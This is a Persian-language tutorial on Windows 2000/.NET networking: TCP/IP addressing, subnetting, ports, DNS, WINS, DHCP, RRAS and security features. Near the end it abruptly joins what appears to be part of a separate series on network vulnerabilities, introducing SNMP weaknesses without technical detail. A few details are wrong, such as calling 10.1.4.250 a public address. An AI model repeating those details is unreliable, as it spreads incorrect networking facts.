اکسترانت، اين امکان را به يک سازمان خواهد داد تا شبکه موجود را بمنظور اشتراک اطلاعات با مشتريان ، تامين کنندگان محصولات  و ساير نمايندگان تجاری، توسعه و گسترش نمايند.اکسترانت ، محدوديت های لازم بمنظور دستيابی به اطلاعات موجود در اينترانت يک سازمان را بر اساس سطح مجوزهای مربوطه ، برای کاربران ( کاربران خارج از سازمان و شبکه ) فراهم می نمايد. ويندوز 2000 ، امکانات لازم بمنظور  پيکربندی يک اکسترانت را ارائه و شبکه اينترانت را در مقابل دستيابی غير مجاز، ايمن می سازد . يک اکسترانت از طريق اتصالات ايمن VPN ايجاد ، و پيکربندی آنها  با توجه به نيازهای مربوطه ، انجام خواهد شد. مثلا" در برخی موارد ممکن است  امکان دستيابی صرفا" به اکسترانت محدود و در برخی موارد ديگر يک دپارتمان نيازمند دستيابی به دپارتمان ديگر بر روی اينترانت باشد .

سيستم عامل ويندوز، نظير ساير سيستم های عامل شبکه ای امکانات و پتانسيل های گسترده ای را در چارچوب مجموعه ای از تکنولوژی  ، ارائه می نمايد. تکنولوژی های ارائه شده را می توان در سه گروه عمده تقسيم نمود : تکنولوژی های ارتباط ، سرويس های شبکه و امنيت  . در اين مقاله به بررسی هر يک از امکانات ارائه شده در گروه های فوق، خواهيم پرداخت .

ارتباطات
از اهداف اوليه يک سيستم عامل ؛ ارائه سرويس های ارتباطی لازم برای  برنامه هائی است که بر روی سيستم عامل اجراء می گردند . ويندوز 2000 و ويندوز دات نت ، برنامه هائی را بهمراه API ارائه نموده که  امکانات لازم در خصوص نيل به اهداف فوق را فراهم می نمايد. بعبارت ديگر ، برنامه ها می بايست قادر به درخواست عمليات ارسال و دريافت داده با ساده ترين حالت ممکن،از سيستم عامل باشند. سيستم عامل می بايست صرفنظر از نوع ارتباط ( شبکه محلی ، شبکه های بدون کابل ، ارتباطات مبتنی بر خط تلفن ) ، امکانات لازم را در اين خصوص ارائه نمايد.
ويندوز از پروتکل شبکه ای TCP/IP ، بعنوان پروتکل اوليه و ذاتی خود استفاده می نمايد. ويندوز حمايت لازم در خصوص پروتکل های شبکه قديمی تر نظير Microsoft NWLink که با پروتکل شبکه ای IPX/SPX شرکت ناول ، سازگار است را  نيز ارائه می نمايد . مزيت مهم پروتکل TCP/IP ، عدم وابستگی آن نسبت به نوع  محيط انتقال است . بدين ترتيب ، امکان استفاده از پروتکل فوق ، در هر نوع شبکه ای وجود خواهد داشت . سرويس دهندگان NET Enterprise . ، بصورت مستمر با پروتکل TCP/IP ، در ارتباط بوده و از آن بعنوان پروتکل اساسی استفاده می نمايند . با توجه به نقش حياتی پروتکل فوق برای اکثر سرويس دهندگان NET Enterprise . ، طراحی ، پياده سازی  و نگهداری  شبکه ای که از سرويس دهندگان  NET Enterprise . ، استفاده می نمايد ، مستلزم شناخت مناسبی از نحوه عملکرد پروتکل TCP/IP و نحوه ارتباط برنامه ها با آن است. دراين مقاله قصد نداريم به جزئيات مربوط به پروتکل TCP/IP پرداخته و هدف صرفا" آشنائی با مفاهيم اوليه پروتکل فوق ، بمنظور استفاده در شبکه های مبتنی بر سيستم عامل ويندوز است .

آدرس دهی TCP/IP
تمامی کامپيوترهای موجود بر روی يک شبکه مبتنی بر TCP/IP ، می بايست دارای يک آدرس منحصربفرد باشند. ( آدرس فوق ، IP ناميده می شود) . عملکرد آدرس فوق شباهت زيادی به اختصاص يک شماره تلفن خاص  برای کامپيوتر دارد . آدرس ها در زمان درج( واردکردن) و نمايش با فرمت dotted-decimal ارائه می شوند.( نظير : IP:192.168.10.10 ) . هر گروه از اعداد توسط يک نقطه از هم جدا می شوند که از آنان با نام  octet ،  ياد می گردد . يک آدرس IP ، شامل دو بخش متفاوت اطلاعاتی است : يک شماره مشخصه شبکه ( Network ID Number ) و يک شماره مشخصه منحصربفرد ميزبان ( host ID number ) . شماره مشخصه شبکه ، شباهت زيادی به کد يک ناحيه و يا شهرداشته  و توسط تمامی کامپيوترهای موجود بر روی يک شبکه ، به اشتراک گذاشته می شود. شماره مشخصه ميزبان ، باقيمانده شماره تلفن است .و بصورت کاملا" انحصاری  يک ميزبان خاص در شبکه را مشخص خواهد کرد . بمنظور اطمينان از اين موضوع که تمامی کامپيوترهای موجود در اينترنت دارای يک آدرس IP منحصربفرد می باشند ، فرآيند اختصاص آدرس های IP ،  توسط IANA)Interner Assigned Numbers Authority) مديريت می گردد . IANA ، آدرس های IP را در اختيار مراکز اصلی ISP ، قرار داده و و مراکز فوق،  آدرس های IP را در اختيار افراد حقوقی و حقيقی قرار خواهند داد. IANA ، سه بلاک از آدرس های IP را برای استفاده خصوصی ، رزو نموده است. (امکان استفاده از آدرس های فوق ، در اختيار کامپيوترهای اينترنت قرار نخواهد گرفت) .سازمان ها و موسسات می توانند از  آدرس های خصوصی فوق،  در شبکه های اختصاصی خود استفاده نمايند.
مدل آدرس دهی جديد IP ، با نام IPv6 ، است و قرار است به  نياز تصاعدی ( فزاينده ) در رابطه با تعداد آدرس های در دسترس و عمومی پاسخگو باشد. سخت افزار ها  و نرم افزارها ی موجود در حال حاضر امکانات حمايتی لازم بمنظور استفاده ازIPv6  را دارا نمی باشند و بدين دليل ما همچنان از مدل آدرس دهی قديمی استفاده می نمائيم . IPv6 ، چندين سال است که مطرح گرديده است ولی عمليات  آداپته نمودن آن دارای آهنگی کند است  و نبايد انتظار داشته باشيم که مدل آدرس دهی فوق را بزودی در محيط خود شاهد باشيم. 
با اينکه کامپيوترهائی که از آدرس خصوصی IP استفاده می نمايند ، قادر به دستيابی مستقيم به اينترنت نمی باشند ( برای دستيابی به اينترنت ، می بايست ازيک آدرس عمومی IP استفاده گردد) . از NAT)Network Address Translation) بعنوان پتانسيلی  که قادر به ترجمه آدرس های عمومی و خصوصی است ، استفاده می گردد. NAT ، امکان استفاده از آدرس های IP خصوصی بمنظور اتصال به اينترنت را برای کاربران يک سازمان، فراهم و باعث کاهش تعداد آدرس های IP عمومی مورد نياز بمنظور ارتباط ودستيابی به اينترنت می گردد . سرويس ( Routing and Remote Access Service(RRAS ويندوز دارای قابليت ها و پتانسيل های  NAT بهمراه ساير پتانسيل های کليدی ديگر است.

روتنيگ و Subnet
برای يک شبکه کامپيوتری وجود تعداد زيادی کامپيوتر در شبکه و عدم توانائی بمنظور سرويس دهی مناسب و سريع به آنان ، نمی تواند بعنوان يک مزيت مطرح گردد. ( دقيقا" مشابه وجود تعداد زيادی اتومبيل در يک بزرگراه ). شبکه های کامپيوتری بمنزله  منابع ارتباطی مشترکی بوده و حضور  تعداد زيادی کامپيوتر بر روی يک شبکه نظير وجود  صدها اتوميبل سرگردان در ترافيک يک بزرگراه است . بمنظور پيشگيری از ازدحام( شلوغی )  ، شبکه های کامپيوتری به چندين بخش مستقل ديگر و با نام " سگمنت " ( Segment ) ، تقسيم می گردند.  هر سگمنت ، اساسا" خود  يک شبکه کامپيوتری با قابليت های منحصر بفرد خود است. با توجه به رويکرد فوق ( تقسيم شبکه به چندين سگمنت) ،  ما با مسئله ای ديگر مواجه خواهيم شد و آنهم نحوه انتقال اطلاعات بين هر يک از شبکه ها است . اگر شما شبکه های کامپيوتری را بعنوان همسايه ای در مجاورت منزل خود در نظر بگيريد،  می توان عرضه اطلاعات بين آنها را نظير توزيع يک  نامه دانست  در صورتيکه قصد ارسال نامه برای شخصی در همسايگی خود را داشته باشيد ، می بايست متن مورد نظر خود را نوشته و آن را در صندوق پستی مربوطه ، قرار دهيد . در صورتيکه قصد ارسال نامه برای همسايه ديگری را داشته باشيم ( ساکن در محلی ديگر در کشور) ،  به اداره پست مراجعه و نامه را برای وی ارسال می نمائيم . اداره پست، با فرآيند توزيع ( روت)   يک نامه  از نقطه ای به نقطه ای ديگربخوبی آشنا بوده و می تواند نامه را با  کارآئی مطلوبی به مقصد مورد نظر برساند. زمانيکه اطلاعات از کامپيوتری در شبکه به کامپيوتری در شبکه ديگر ارسال می گردند،ما با واقعيتی مهم و با نام " روتينگ " ( Routing ) مواجه خواهيم بود.
روتينگ ، توسط دستگاههای سخت افزاری خاصی  با نام "روتر" ، مديريت و اداره می گردد . روترها ، چندين شبکه را در زمان يکسانی بيکديگر متصل و مسئول انتقال اطلاعات ( داده ) بين شبکه ها می باشند. عملکرد روترها بر اين واقعيت  مسلم استواراست که در فرآيند انتقال اطلاعات توسط  TCP/IP ،  آدرس IP کامپيوتر مقصد، حضوری کاملا" محسوس و هميشگی دارد. آدرس های IP شامل مشخصه شبکه ( Network ID ) و مشخصه ميزبان ( Host ID ) می باشند. با تامل در يک آدرس IP عمومی نظير  IP: 10.1.4.250 ،  تشخيص مشخصه شبکه و ميزبان ، امری مشکل بنظر می آيد. بمنظور مشخص نمودن مشخصه های فوق ، کامپيوترها از Subnet mask استفاده می نمايند. بمنظور شناخت مناسب نسبت به نقش Sunet mask ، لازم است بدين نکته بديهی! اشاره گردد که تمام فعاليـت ها در کامپيوتر با فرمت باينری ، انجام می شود. بعبارت ديگر، هر چيز در کامپيوتر بصورت مجموعه ای از صفر و يک نمايش داده می شود . فرص کنيد Subnet mask ، مثال فوق را Subnet: 255.255.0.0 ، در نظر بگيريم . در صورتيکه هر octet درآدرس IP  و Subnet mask را به باينری تبديل نمائيم ، نتايج زير را خواهيم داشت :

• IP address : 00001010.00000001.00000100.11111010
• Subnet mask: 11111111.11111111.00000000.00000000

Subnet mask ، مشخص می نمايد که کدام بخش از آدرس IP ، نشاندهنده مشخصه شبکه و کدام بخش نشاندهنده مشخصه ميزبان است . دقت داشته باشيد که هرoctet ، شامل هشت رقم باينری است و يا بيت است . هر بيت در Subnet mask که مقدار يک را دارا است ، نشاندهنده بخشی از آدرس IP  مشخصه شبکه ، است . هر صفر در Subnet mask مرتبط با يک بيت در آدرس IP ، مربوط به مشخصه ميزبان است . بنابراين ، در مثال فوق، مشخصه شبکه شامل   network ID : 10.1.x.x و مشخصه ميزبان host ID :  4.250 ،  است . دقت داشته باشيد که Subnet mask ، می بايست همواره شامل رشته ای از يک ها بوده که بدنبال آن رشته ای از صفرها ، قرار می گيرد. از لحاظ تئوری اين امر امکان پذير خواهد بود که دارای يک Sunbet mask باشيم که به چيزی مطابق زير ترجمه شده باشد( رشته يک ها و صفرها با اصل اشاره شده مغايرت داشته باشد)  . ولی اين نوع  subnet در حال حاضر توسط TCP/IP حمايت نمی گردد .

11110111.00111100.11100011.00000000

زمانيکه ويندوز نيازمند ارسال اطلاعات است ، از  مشخصه شبکه مقصد، استفاده و آن را با  مشخصه شبکه مربوط به خود ، مقايسه می نمايد. در صورتيکه دو مشخصه شبکه ، يکسان باشند، ويندوز اطلاعات را برای يک کامپيوتر محلی موجود بر روی شبکه ارسال می نمايد( ضرورتی به روتينگ وجود نخواهد بود) . در صورتيکه مشخصه های دو شبکه يکسان نباشند ، ويندوز اطلاعات رابرای gateway پيش فرض ، ارسال می نمايد. ( يک آدرس IP خاص که در ويندوز پيکربندی شده است) . gateway پيش فرض، معمولا" يک روتر است . روتر مسئوليت استقرار داده بر روی شبکه مورد نظر را بر عهده داشته و در صورت لزوم بسته اطلاعاتی را برای روتر ديگر ارسال خواهد کرد .

پورت های برنامه
زمانيکه يک بسته اطلاعاتی به مقصد مورد نظر می رسد ، کامپيوترمقصد  نيازمند روشی بمنظور تشخيص نوع عملياتی است که می بايست در رابطه با  بسته اطلاعاتی دريافتی انجام شود. انجام چندين عمليات متفاوت بصورت همزمان و  نگهداری وضعيت شبکه در يک حالت مطمئن و کارآ ، امری پيچيده بنظر می آيد. مثلا" فرض کنيد ، با استفاده از برنامه مرورگر، قصد مشاهده يک وب سايت را در  پنجره مربوطه داشته باشيد و در همان حالت پنجره ای ديگر فعال و يک سند word ، در آن فعال شده باشد  در چنين حالتی بر روی کامپيوتر خود شاهد دو نوع ترافيک خواهيم بود: ترافيک داده هائی که باعث نمايش صفحه وب در مرورگر شده و ترافيک داده هائی  که باعث نمايش يک سند word خواهد شد.  کامپيوتر شما چگونه از اين موضوع آگاهی پيدا می نمايد که مرورگر می بايست اولين بخش داده را دريافت  در حاليکه Word می بايست بخش ديگری را اخذ نمايد؟
پاسخ به سوال فوق ، شماره پورت ( port )  است . پورت ، مشابه يک آدرس IP برای يک برنامه خاص موجود بر روی کامپيوتر است . زمانيکه کامپيوتر شما داده ئی را ارسال می نمايد ، داده برای يک آدرس IP ارسال می گرددکه نشاندهنده شبکه و ميزبان مقصد مورد نظر ، بهمراه  يک شماره پورت خاص است که برنامه خاصی را  بر روی کامپيوتر مقصد ، بعنوان مقصد نهائی اطلاعات مشخص خواهد کرد. مثلا"  درخواست های مربوط به صفحات وب ، همواره برای پورت 80  ارسال خواهد شد . IANA ، مسئوليت اختصاص شماره پورت به برنامه ها را نيز برعهده داشته و اين اطمينان بوجود خواهد آمد که  اکثر برنامه های متداول دارای يک شماره پورت منحصر بفرد در اين راستا خواهند بود . زمانيکه يک کامپيوتر مبتنی برسيستم عامل ويندوز، داده ئی را دريافت می نمايد ، شماره پورت آن بررسی تا مشخص گردد که کدام برنامه می بايست داده را دريافت نمايد.
پورت ها دارای نقشی مهم در رابطه با امنيت می باشند. تعداد زيادی از شرکت ها ، امکان استفاده عموم از وب سايت و يا سرويس دهنده FTP را بمنظور دريافت فايل ، فراهم می نمايند. شرکت ها و موسسات تمايلی به فراهم نمودن امکان دستيابی عموم به  سرويس دهندگان فايل ، سرويس دهندگان چاپ و ساير منابع موجود درشبکه اختصاصی خود ، را ندارند.هر يک ازعمليات فوق ، از طريق يک شماره پورت خاص انجام شده و می توان بنوعی آنها را بلاک نمود. پورت ها دارای جايگاهی خاص بمنظور فيلترينگ ترافيک و ايمن سازی شبکه می باشند. دستگاه های شبکه ای که "فايروال " ناميده شده و يا نرم افزارهای فايروال نظير ISA(Internet Security and Acceleration Server) ، قادر به کنترل ترافيک ورودی به شبکه بر روی شماره پورت های خاصی بوده و حتی می توان ترافيک را بر روی پورت های خاصی ، بلاک کرد .
IANA، شماره پورت های صفر تا 1024 را تعريف که از آنان با نام پورت های " خوش نام  " ، ياد می گردد. ويندوز شامل ليستی  از اين پورت ها بوده که در يک فايل متنی با نام Services و در آدرس system32\Drivers\ETC  ، ذخيره شده اند.

سرويس های شبکه
سيستم عامل ويندوز، مجموعه ای از سرويس های اساسی شبکه را ارائه که می توان از آنان در هر نوع شبکه ( بزرگ تا کوچک )، استفاده کرد . اين سرويس ها توسط عناصر انتخابی که بهمراه ويندوز ارائه می گردند ، قابل استفاده خواهند بود. امکانات فوق،  شامل :  سرويس  Name Resolution ، سرويس پيکربندی IP و سرويس RRAS ، می باشد. در ادامه به تشريح هر يک از سرويس های فوق خواهيم پرداخت .

سرويس Name Resolution
سرويس Name Resolution ، در هر نوع شبکه دارای اهميت و جايگاهی خاص است. کامپيوترها برای آدرس دهی يکديگر علاقه مند به استفاده از آدرس های IP می باشند ولی ما ، با اسامی معنی دار بهتر کار می کنيم ( مثلا" ServerA ) . سرويس name Resolution ، اين امکان را در اختيار کاربران قرار خواهد داد که همچنان از اسامی معنی دار برای سرويس دهندگان و ساير منابع شبکه استفاده نمايند. در چنين مواردی  می بايست از امکاناتی بمنظور ترجمه (Resolve )  اسامی به آدرس های IP  استفاده تا در ادامه زمينه ارتباطات در شبکه فراهم گردد . ويندوز در اين رابطه دو سرويس را ارائه نموده است  :
DNS)Domain Name System) و WINS)Windows Internet Naming Service) .

DNS
سرويس DNS ، توسط کامپيوترهائی که بر روی آنان يک سرويس دهنده DNS اجراء شده است ، ارائه می گردد. سيستم های عامل ويندوز تقريبا" با هر نوع  سرويس دهنده DNS ،  استاندارد سازگار می باشند . ( مثلا" سرويس دهندگانی که بر روی سيستم عامل يونيکس اجراء می گردند) . ويندوز دارای نسخه اختصاصی خود در رابطه با سرويس دهنده DNS بوده که می توان آن را بر روی هر نوع سيستم عامل ويندوز ( 2000 و يا دات نت ) ، نصب نمود.
تفاوت بين DNS و WINS چيست ؟ WINS ، بمنظور ترجمه اسامی کامپيوترها به آدرس های IP ، استفاده می گردد.اسامی استفاده شده ، نوع خاصی از نام های مبتنی بر ويندوز می باشند. DNS ، بمراتب متداول تر بوده و از آن بمنظور ترجمه اسامی ميزبان استفاده می شود . در محيط ويندوز ، تفاوت زيادی بين دو نوع نام ( اسامی خاص مبتنی بر ويندوز و اسامی ميزبان ) وجود نداشته  و هر دو نوع ، معادل می باشند. از نسخه  ويندوز 2000 به بعد ، تاکيد مضاعف بر استفاده از DNS در دستور کار  قرار گرفته  و ماکروسافت ، استفاده محدود و کم رنگ WINS در ويندوز را بعنوان يک سياست محوری در ويندوز دنبال می نمايد.
بمنظور پيکربندی IP هريک از کامپيوترهای موجود درشبکه ، می بايست آدرس IP  و  حداقل يک سرويس دهنده DNS  را مشخص کرد. در اين رابطه نمی توان از نام سرويس دهنده DNS در مقابل آدرس IP ، استفاده نمود.(روشی بمنظور ترجمه اسامی  به آدرس IP بدون يک سرويس دهنده DNS وجود ندارد). پس از پيکربندی آدرس IP سرويس دهنده DNS ، ويندوز 2000 و نسخه های بعد از آن ، قادر به استفاده از سرويس دهنده DNS بمنظورترجمه  نام به آدرس IP معادل ، خواهند بود.
سيستم DNS اينترنت ، بصورت سلسله مراتبی است . در بالاترين سطح ، domain های سطح بالا و يا TLDs)Top-level Domains) ، قرار دارند. استفاده کنندگان متعددی از سرويس دهندگان DNS مربوط به TLD  اينترنت استفاده می نمايند . اين سرويس دهندگان شامل مرجع  کاملی در ارتباط با ساير سرويس دهندگان در ساختار سلسله مراتبی، می باشند. فرض کنيد که شما قصد ارتباط با http://www.test.com  را داشته باشيد و سرويس دهنده DNS سازمان شما ، دارای يک entry برای http://www.test.com نمی باشد . در اين حالت با يک سرويس دهنده DNS تائيد شده ديگر درTLD ، ارتباط برقرار می گردد.سرويس دهده TLD ، از آدرس سرويس دهنده  معتبری که  شامل آدرس Test.com ، آگاهی داشته و سرويس دهنده قادر به ارائه يک آدرس برای کامپيوتری با نام http://www ، خواهد بود . فرآيند فوق ، دارای انعطاف و کارآئی بالا در رابطه با يافتن آدرس IP مربوط به domain name ، است .
ويندوز از يک ويژگی خاص DNS با نام Dynamic DNS)DDNS) ، استفاده می نمايد. زمانيکه  يک کامپيوتر مبتنی برويندوز 2000 ( و يا نسخه های بعد از آن ) فعاليت خود را آغاز می نمايد ، با سرويس دهنده DNS مربوطه ، مرتبط و نام کامپيوتر و آدرس IP موجود خود  را در اختيار آن قرار خواهد داد .سرويس دهنده DNS ، بانک اطلاعاتی خود را بهنگام تا متاثر ازآخرين تغييرات گردد. DDNS ، امکان بهنگام سازی پويای سرويس دهنده DNS  را برای کامپيوترها فراهم می نمايد. بدين ترتيب ، بانک اطلاعاتی DNS شامل آخرين اطلاعات مرتبط با آدرس های  IP  شده و سرويس دهنده DNS  ، قادر به ارائه سرويس خود بصورت پويا و متاثر از آخرين تغييرات انجام شده در شبکه ، خواهد بود .
بمنظور کاهش حجم عمليات مربوط به name resolution در يک محيط عملياتی بزرگ ، می توان از يک سرويس دهنده ثانويه و يا سرويس دهندگان Caching ، استفاده کرد.  سرويس دهنده ثانويه ، دارای بانک اطلاعاتی اختصاصی خود نبوده و از بانک اطلاعاتی DNS  موجود بر روی  يک سرويس دهنده DNS  اوليه ، استفاده می نمايد. سرويس دهندگان ثانويه ، گزينه ای مناسب برای ارائه خدمات مربوط به name resolution بوده  ولی قادر به  بهنگام سازی پويای DNS نخواهند بود. ( برخی از انواع سرويس دهندگان ثانويه قادر به دريافت اطلاعات بهنگام شده و ارسال آنان برای سرويس دهنده اوليه ، می باشند ) . سرويس دهندگان Caching DNS ، زمانيکه يک درخواست name resolution را دريافت می نمايند ، با يک سرويس دهده DNS بمنظور اتمام عمليات خود ، ارتباط برقرار خواهد کرد. سرويس دهنده Caching ، درادامه آدرس IP را استفاده و آن را بمنظور پاسخ به درخواستی مشابه ، ذخيره می نمايد.
نرم افزار سرويس دهنده DNS ويندوز، امکان ذخيره داده های DNS را در يک فايل متن و يا در اکتيو دايرکتوری ، فراهم  می نمايد. با انتخاب اکتيو دايرکتوری ، دارای گزينه ای مبنی بر نصب DNS بر روی هر domain controller خواهيم بود. در چنين مواردی در صورت  بروز اشکال دراکتيو دايرکتوری ، امکان بازيابی سريع اطلاعات وجود خواهد داشت ( می توان DNS را بر روی يک domain controller ديگر نصب تا زمينه استفاده از اطلاعات DNS موجود در اکتيو دايرکتوری ، فراهم گردد.) .

WINS
سرويس WINS ، دارای عملکردی نسبتا" مشابه DNS  با تفاوت هائی اندک است . قبل از ويندوز 2000 ، کامپيوترهای موجود در شبکه از پروتکلی با نام NetBIOS استفاده می کردند. در چنين حالتی ، هر کامپيوتر دارای يک نام منحصر بفرد بوده و سرويس دهنده  WINS ، مسئول ارائه سرويس name resolution  بمنظور ترجمه اسامی NetBIOS ، به آدرس های IP  معادل است. DNS ، نيز نيازمند يک نام منحصر بفرد است ( صرفا" در يک domain خاص). مثلا" DNS ، امکان تعريف  نام Client1 را برای يک کامپيوتر موجود در  حوزه Test.com  و Microsoft.com ، فراهم می نمايد.WINS ، از يک سيستم نامگذاری مسطح تبعيت نموده  و می بايست تمامی کامپيوترهای موجود در شبکه دارای اسامی منحصر بفردی باشند .بدين ترتيب نبايد انتظار داشته باشيم که از سرويس  WINS ، در شبکه اينترنت ، استفاده  گردد ( در اينترنت از سرويس  DNS ، استفاده می گردد) . استفاده ازسرويس  WINS درصورت لزوم فقط برای  شبکه های محلی خصوصی، پيشنهاد می گردد.
ويندوز 2000 و نسخه های بعد از آن ، همچنان از اسامی NetBIOS بمنظور سازگاری با نسخه های قبل از خود استفاده می نمايند . در ويندوز 2000 و ويندوز دات نت ،  سرويس دهنده WINS ، نيز ارائه گرديده تا زمينه حمايت و سازگاری برای سرويس گيرندگان قديمی که همچنان مرتبط با WINS ، می باشند ، فراهم گردد. ماکروسافت بتدريج استفاده از NetBIOS را حذف  و از DNS برای ترجمه نام به آدرس ،  در مقابل سرويس WINS استفاده می نمايد.
يکی از ويژگی های منحصربفرد سرويس WINS ، قابليت تکرارپذيری( Replicate ) آن بين سرويس دهندگان متعدد WINS در يک شبکه است .بدين ترتيب ، می توان از  چندين سرويس دهنده WINS بر روی شبکه بهمراه  يک بانک اطلاعاتی  مشترک بين آنها ، استفاده گردد. سرويس دهنده WINS ، قادر به ارتباط با ساير سرويس دهندگان  بمنظور مبادله اطلاعات جديد و آدرس های بهنگام شده IP ، خواهد بود.

پيکربندی IP
بر روی يک شبکه کوچک ، پيکربندی آدرس های IP ، Subnet mask , default gatway ,DNS  و WINS برای هريک از  کامپيوترهای  موجود درشبکه کار مشکلی نخواهد بود . در شبکه های بزرگ که شامل صدها و يا هزاران کامپيوتر می باشند ، پيکربندی دستی مصيبتی است بس بزرگ ! و زمان زيادی را بخود اختصاص خواهد داد.  پروتکل TCP/IP شامل پروتکلی با نام DHCP)Dynamic Host Configuration Protocol) بوده که می توان از آن  بمنظور درخواست پويای پيکربندی IP ، از يک سرويس دهنده DHCP ،استفاده نمود. پيکربندی سرويس دهنده DHCP ، می تواند بگونه ای صورت پذيرد که شامل اطلاعات ضروری مرتبط با پيکربندی IP ، باشد . سرويس دهنده فوق ، وضعيت آدرس های IP تخصيص يافته را ثبت تا اين اطمينان بوجود آيد که هرگز از دو آدرس مشابه درشبکه استفاده نخواهد شد. سرويس دهنده DHCP ، همچنين قادر به  ارائه آدرس سرويس دهندگان DNS، WINS و  gateway پيش فرض مرتبط با سگمنت مربوطه، خواهد بود.

سرويس روتينگ و دستيابی از راه دور ( RRAS)
ويندوز ، شامل سرويس RRAS)Routing and Remote Access Service) است. سرويس فوق ، اين امکان را برای يک سرويس دهنده ويندوز فراهم می نمايد که بعنوان يک روتر نرم افزاری ، يک سرويس دهنده VPN)Virtual private network) و يک سرويس دهنده Dial-up مطرح گردد. نرم افزار RRAS ، بصورت پيش فرض برروی ويندوز نصب می گردد ولی بمنظور انجام عمليات خاصی ، پيکربندی نشده است. اکثر مديران شبکه از RRAS  بعنوان يک سرويس دهنده VPN استفاده و از آن بمنظور ارتباط دو شبکه موجود در ادارات يک سازمان از طريق اتصال اينترنت استفاده می نمايند. مديران شبکه می توانند ، پيکربندی لازم در خصوص استفاده از سرويس RRAS بمنظور دستيابی از طريق تلفن به شبکه را برای پرسنل سازمان خود، فراهم نمايند.

امنيت
شايد مهمترين عملياتی که يک سيستم عامل شبکه ای می بايست انجام دهد ، پرداختن و بهاء دادن به مقوله امنيت است . سيستم عامل ويندوز شامل تکنولوژی های متعددی بمنظور افزايش امنيت است :

• سيستم فايل NTFS ، پتانسيل های لازم بمنظور اختصاص مجوزهای دستيابی لازم را برای کاربران و يا گروه ها ، فراهم می نمايد .
• ويندوز،  پروتکل IPSec را حمايت می نمايد . IPSec ، پروتکلی است که امنيت را در سطح پروتکل های حمل شبکه ، اعمال می نمايد . IPSec می تواند بمنظور رمزنمودن نوع خاصی از ترافيک ، رمزنگاری ترافيک بين کامپيوترهائی خاص و ساير موارد مشابه  استفاده گردد. مثلا" اگر سازمانی دارای يک سرويس دهنده فايل حاوی اطلاعات محرمانه است ، می توان IPSec را بر روی سرويس دهنده فوق ، پيکربندی نمود. بدين ترتيب، سرويس دهنده  صرفا" ارتباطاتی را از سرويس گيرندگانی می پذيرد  که قادر به حمايـت از يک ارتباط رمز شده ، باشند .
• کامپيوترهای مبتنی بر سيستم عامل ويندوز را می توان بمنظور استفاده از رمزهای عبور پيچيده و طولانی در ارتباط با account های مربوط به کاربران ، پيکربندی کرد. تشخيص و حدس  چنين رمزهای عبوری ، کار مشکلی خواهد بود. با استفاده از ساير سياست های امنييتی رمز عبور، می توان  کاربران  را ملزم به تغيير رمز عبور در محدوده های زمانی مشخص ، استفاده از رمز عبور منحصر بفرد و متفاوت با دفعات قبل  و قفل نمودن يک account در موارديکه افرادی قصد تشخيص آن را بصورت سعی و خطاء دارند ، نمود.
• کامپيوترهای ويندوز 2000 و بعد از آن ، بصورت ذاتی از پروتکل تائيد Kerberos ، استفاده می نمايند. بدين ترتيب سرويس دهنده تضمين لازم در خصوص شناسائی و تائيد کاربر را انجام و کاربران نيز اطمينان لازم در خصوص ارتباط با يک سرويس دهنده مطمئن را بدست خواهند آورد.
• ويندوز دارای يک API)Appliaction Programming Interface) لازم، بمنظور رمزنگاری داده ها با نام CryptoAPI است . اينترفيس فوق ، تسهيلات لازم در خصوص ايجاد نرم افزارهائی که نيازمند استفاده از روش های رمزنگاری بمنظور حفاظت از اطلاعات می باشند را فراهم می نمايد.
• سيستم فايل NTFS ، امکانات حمايتی لازم در خصوص Encrypted File System)EFS) را ارائه می نمايد . بدين ترتيب ، کاربران قادر به رمز نمودن فايل ها بوده و در ادامه می توانند براحتی به فايل های رمز شده دستيابی نمايند ( نظير فايل هائی که رمز شده نيستند ) . ساير کاربران قادر به دستيابی به فايل های رمز شده نخواهند بود. بمنظور حفاظت از اطلاعات در يک سازمان، EFS ، پتانسيل های لازم در خصوص بازيافت داده ها را برای مديران تائيد شده که نيازمند داده های رمز شده می باشند، فراهم می نمايد.

پيکربندی پيش فرض،  سيستم عامل ويندوز نسبتا" غير ايمن است .ظاهرا" هدف ماکروسافت دراين رابطه  تسهيل در نصب و مديريت  سيستم عامل بوده است . همين موضوع می تواند منشاء برخی از تهاجمات اطلاعاتی در رابطه با سيستم هائی باشد که پذيرای حکومت سيستم عامل ويندوز شده اند. ماکروسافت در نسخه های ويندوز دات نت ، از سياست فوق ، عدول و سعی نموده است امکانات گسترده ای را بمنظور ايمن سازی پيکربندی پيش فرض، ارائه نمايد. بمنظور انتخاب تعداد زيادی از ويژگی های Windows .NET Server 2003 ، می بايست پيکربندی و نصب اضافه ای انجام شود. بسياری از ويژگی های اختياری ( نظير IIS ) بصورت پيش فرض غير فعال می باشند. (يشگيری اوليه  در رابطه با حفاظت اطلاعات).

آنچه تاکنون گفته شده است :

• بخش اول  : بررسی BIND Domain Name System  و RPC
• بخش دوم  : بررسی  Apache Web Server و روش های تائيد کاربران
• بخش سوم : بررسی سرويس های Clear Text  و  Sendmail

در بخش چهارم اين مقاله به بررسی نقاط آسيب پذير  ( Simple Network Management Protocol (SNMP و ( Secure Shell (SSH ، خواهيم پرداخت .

هفتمين نقطه آسيب پذير : ( Simple Network Management Protocol (SNMP
از پروتکل SNMP بمنظور کنترل ، مانيتورينگ از راه دور و پيکربندی  تمامی دستگاه های پيشرفته مبتنی بر TCP/IP  در ابعاد گسترده ای  استفاده می شود.با اينکه  استفاده از SNMP در بين پلات فرم های متفاوت شبکه استفاده می گردد، ولی در اغلب موارد از آن  بمنظور پيکربندی و مديريت دستگاههائی نظير چاپگر ، روترها ، سوئيچ ها ، Access point ها  و دريافت داده های مورد نياز دستگاههای مانيتورينگ شبکه ، استفاده می شود .
SNMP ، از روش های متفاوتی بمنظور مبادله پيام بين ايستگاههای مديريت SNMP و دستگاههای شبکه ای  استفاده می نمايد . روش های استفاده شده بمنظور برخورد با پيام های مبادله شده و مکانيزم تائيد و معتبر سازی پيا م ها،  از جمله عوامل اصلی در رابطه با  نقاط آسيب پذير SNMP می باشند .
